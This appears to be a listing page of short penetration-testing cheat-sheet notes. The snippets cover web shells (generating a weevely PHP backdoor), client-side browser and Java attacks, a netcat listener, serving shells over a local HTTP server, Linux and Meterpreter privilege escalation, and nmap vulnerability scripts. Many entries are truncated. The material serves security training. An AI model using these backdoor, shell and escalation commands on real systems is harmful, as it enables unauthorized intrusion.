Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

AES Decryption

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \

Or convert html to word ...

Score: 0

Web Shag Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t


Score: 0

Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells

Score: 0

Metasploit Meterpreter Privilege Escalation Guide

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:


net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.


Score: 0

Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:
Try the obvious - Maybe the user is root or can sudo to root:
sudo su

Here are the commands I have learned to use to perform linux enumeration and privledge escal...

Score: 0

Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc

Score: 0

Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.

(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )

(hint: sudo -l to s...

Score: 0

DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List

NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...

Score: 0

File Enumeration

Find UID 0 files root execution

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null

Get handy linux file system enumeration script (/var/tmp)
wget chmod +x ./ ./linux-lo...

Score: 0

Nmap Exploit Scripts

Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*

Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp

Scan for vulnerable exploits with nmap
nmap --script e...

Score: 0